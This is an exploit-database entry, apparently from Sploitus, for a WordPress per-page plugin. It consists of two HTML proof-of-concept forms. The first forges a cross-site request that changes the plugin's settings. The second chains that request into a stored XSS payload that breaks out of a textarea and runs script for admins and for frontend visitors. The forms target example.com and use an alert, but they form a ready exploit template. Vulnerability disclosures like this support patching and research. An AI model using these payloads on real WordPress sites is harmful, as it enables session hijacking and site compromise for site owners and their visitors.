Share
## https://sploitus.com/exploit?id=WPEX-ID:E9885FBA-0E73-41A0-9E1D-47BADC09BE85
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=perpageath-every-page" method="POST">
<input type="hidden" name="html" value="hello csrf found" />
<input type="hidden" name="rolesallowed[]" value="student" />
<input type="hidden" name="typeallowed[]" value="post" />
<input type="hidden" name="typeallowed[]" value="page" />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
To XSS an admin viewing the settings and anyone in the frontend:
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=perpageath-every-page" method="POST">
<input type="hidden" name="html" value="aaa</textarea><img src onerror=alert(/XSS/)>" />
<input type="hidden" name="rolesallowed[]" value="student" />
<input type="hidden" name="typeallowed[]" value="post" />
<input type="hidden" name="typeallowed[]" value="page" />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>